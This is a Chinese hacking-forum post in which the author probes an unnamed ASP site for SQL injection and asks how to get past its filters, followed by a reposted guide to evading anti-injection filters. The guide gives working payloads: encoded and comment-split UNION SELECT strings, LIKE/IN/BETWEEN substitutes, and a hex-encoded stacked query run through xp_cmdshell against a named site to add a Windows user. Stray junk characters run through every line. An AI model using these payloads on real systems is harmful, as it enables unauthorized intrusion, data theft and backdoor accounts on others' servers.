路过这个网站,检测了一下.
1 u; A3 e0 Z5 p6 S+ @) Zhttp://www.xxx.cn/Article.asp?ID=117 and 1=11 m' P: |; W. [+ P( D( _ X
直接返回主页
8 `8 {# Z0 G6 `" q9 D1 `1 _http://www.xxx.cn/Article.asp?ID=117 or 1=1
# Y& E# V/ S! T! x' h直接返回主页! Q3 R0 L. g# R6 w% W, d
http://www.xxx.cn/Article.asp?ID=117 or/ P( a$ o$ F9 b, J5 Z( w. j) L. v
没有返回主页 没有过滤or
1 p9 Y9 R' { W0 a5 W. y5 _http://www.xxx.cn/Article.asp?ID=117 and
" @) ?6 H. E* I! \5 N2 J直接返回主页 看来过滤了and
% d* W# m( O( k% Ghttp://www.xxx.cn/Article.asp?ID=117 or 16 I+ B# N& {% U+ z! z* K
没有返回主页 即没有过滤or 也没有过滤13 Q5 g( f+ ?! r0 l) X
http://www.xxx.cn/Article.asp?ID=117 or 1=1
8 k) p4 F! q" u2 [1 b" ]直接返回主页 很明显过滤了等号 $ z' v4 P4 m. G- a' ]5 X" Z2 V: n9 N
or的特性是与and相反的.2 f, O, `' {1 \& T2 ?" h. ?' K
or 1=1 爆错 或与原页面不同
. d I( l% g# G3 u: J: A* R/ @! for 1=2 原页面相同
$ |9 E9 q, d+ ?8 g( j- c+ p5 N, s这样就是一个注入点
K' o6 c+ r& b3 w; f但他过滤了=号 我就用><号代替=号吧!
1 p0 r8 R+ n% m# o! Zor 1<2 很明显是正确的,所以应该与原页面不同6 Q& \, R9 b. H/ H8 J; ?
or 1>2 很明显是错误的,所以应该与原页面相同
. J2 c. W3 i( ?# t6 a然后看看有没有过滤其他的查询语句,比如select.
! `, k1 e" |( c" s" w# u3 Khttp://www.xxx.cn/Article.asp?ID=117 select) Y: Y/ H% M* n7 w
直接返回主页" R3 ~0 @ \: {6 ~8 i" j
又迷茫了..; k/ T' f/ }0 p3 l6 R4 |% [
% q& Z! K `) {' C7 d X
8 ]( k- a: V1 V* f1 W
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗
- I! _# X) V9 f2 {3 R9 \: z/ M( y这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
& B4 P0 q3 ~; S" F0 n6 d================================================1 v9 p" _/ V# E8 t5 P0 ~) J
以下是转贴:
8 u1 a+ u# V" ?. L- c- Z4 U. r
: L- u+ {3 Y5 S' D. Y突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 7 l% H9 O2 n+ g: {( Q- [+ N
经过我的收集,大部分的防注入程序都过滤了以下关键字: 4 ?4 S8 K# U7 r* M! U
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
* g8 f7 B3 b6 g t7 z# f而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
" z$ ?2 K7 C/ j, Z! T5 k对于关键字的过滤,以下是我收集的以及我个人的一些想法。 1 |' a% {$ u& k, |) a
1、运用编码技术绕过 : D( o4 W* a" E- n
如URLEncode编码,ASCII编码绕过。例如or 1=1即 - ?' D E7 R* |+ i$ G3 I# }. Q
%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 , e i. M3 g5 S8 S0 W; {) A
+ k6 P5 o. f: T' Z, p9 T9 \2、通过空格绕过
; D9 l8 s2 {$ R0 T2 q如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
. m+ l8 E" U$ _0 V) D: zor’ swords’ =‘swords’
3 P W' K; b/ q, J,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 ' T7 r+ y# o m0 B) g6 A5 g
3、运用字符串判断代替
- F9 |' \0 m6 ~% n用经典的or 1=1判断绕过,如 6 ?/ J3 L+ V5 J: o; i4 ~
or ’swords’ =’swords’
& I% [0 |9 @& t- y8 _,这个方法就是网上在讨论的。 . o- S2 ? R. Z5 B1 c
4、通过类型转换修饰符N绕过
- [5 e6 K- B$ B5 A% R可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 / Z$ M o0 s6 E T9 E: l2 w" `
5、通过+号拆解字符串绕过 % O& \, u4 l) c \
效果值得考证,但毕竟是一种方法。如
; b5 A% i2 b a1 Qor ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
7 {# D9 D" m$ \7 A6 D
, k9 o! a* D0 u4 N6 h6、通过LIKE绕过 7 r% o4 x" Y) d2 t1 N( C
以前怎么就没想到呢?如or % N- N/ Z/ U, W2 V4 k+ \% b
’swords’ LIKE ’sw’ + P' k' K! ^( i/ J: }3 ^& D
!!!显然可以很轻松的绕过 ; p; \9 |- |3 R* m# Y
“=”“>” 1 x6 e7 V6 |: e: ]+ j+ |" a# {
的限制…… 9 X- Z5 G* L3 f5 c
7、通过IN绕过 ) y1 L- Q6 M# Z
与上面的LIKE的思路差不多,如 . S2 ^/ b$ A i; d4 M. Q5 a& u
or ’swords’ IN (’swords’)
2 b7 ^: l& ]' i. b r9 i
+ P! E- N6 v5 g, `) b/ k8、通过BETWEEN绕过 9 p7 c8 J4 ^; U1 z% ^
如
1 d5 q K( z# y* Dor ’swords’ BETWEEN ’rw’ AND ’tw’
+ ~+ ~2 P# D8 s" S* F. R5 R0 d" M2 m) Z& ?6 n* M v! ~1 M
9、通过>或者<绕过
6 f5 t. K- T. e+ h& M% |" ]# ?or ’swords’ > ’sw’ x2 g. A3 k4 A. E5 H+ C9 V
or ’swords’ < ’tw’
1 |% W8 w- q: @5 P# Q9 Q; Sor 1<3 : d: L; {) |9 b, N: K: D
…… ! \( x; g- P5 p- M6 t0 b
10、运用注释语句绕过
$ E' o7 u3 u& ]) a+ Y用/**/代替空格,如:
; E+ c: c- A) M( y# qUNION /**/ Select /**/user,pwd,from tbluser
; a& `8 }% l% R9 Z) t% e) I# {' q- ^1 K* y4 }
用/**/分割敏感词,如:
6 G: n6 s& A# k1 e8 J# YU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser $ ?$ v9 ^6 }8 {
7 ?. H6 J, O6 ~8 q; }8 h
11、用HEX绕过,一般的IDS都无法检测出来
- f6 U3 v5 ^" p2 G% ?0x730079007300610064006D0069006E00 =hex(sysadmin) 9 a4 v3 {! z) r( l* N+ o! | B
0x640062005F006F0077006E0065007200 =hex(db_owner)
/ O+ W+ V* \. h- a另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
& I0 A3 m* @) Z1 I1 C; M1 T% Y! e declare @a sysname , F' d! }3 v# s8 R* q
select @a= - @8 s4 Z" q( s3 i
exec master.dbo.xp_cmdshell @a
0 }( t W6 i, {2 w2 R效果 9 d2 g3 Y8 S7 e0 ]4 d0 ?( W+ ]% q& ^
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
, z5 b: v# r0 X& b, p6 l6 a7 \9 q: \% R3 N
其中的 0 x; t& Z; k/ J& h5 o2 S6 G
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
& H4 w/ f" w8 ?3 ?6 n% q就是 5 N0 v5 ~1 _/ ]- T8 N6 {
“net user angel pass /add”7 v" m; ]. V e6 R4 s n
0 @2 F) v) S* S; v6 e- {一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。. A; i3 `! ~. [: J( y( h
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
. c- W# I! Q w: \另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
7 F. u9 B, K) x9 NCopy code# F' Y! p8 o8 m% E
select * from table exec xp_cmdshell'xxxxxxxxxx'
( H3 @, ?, L+ `# g
5 j5 i6 O2 P* \. @1 D0 W& H- f, C, y' U# C6 k, {
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'& D* H! t' @+ `) m
' S9 z% L5 ~* e
7 }+ M6 h/ T+ \4 q# I
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'. }' I% n' r( q0 f; q
" c Y) R! X; P P2 ]% \/ X) I3 ^: z! \: e- g
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'. E0 A4 i) q$ [8 D0 r
! ^5 @" \5 L: }$ `1 ]8 j0 ?# Z的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧? b3 F# C5 X' A( v8 u8 {6 M
; K/ ~- x/ F1 Q这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了: d3 u8 `7 e" {. [8 }7 F- ]
可能大家早就知道了,不管怎么说,发在这里吧!9 Q+ N( v) ^, s& l, x0 m/ T
+ ]5 t4 k; Z* \7 H9 z最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。9 |+ l/ }! K; ?( G. J8 ~- W
; f$ N- A& n' M0 m) A8 v3 a- |% O$ S) W0 _5 M
0 |6 [/ n- T3 X( W. R% U对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,& a% F/ C- K2 r! L
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
K, c3 k; J, D3 M+ r+ {! [* I& f4 m0 b
|
发表于 2012-9-15 14:47:46
收藏
支持
反对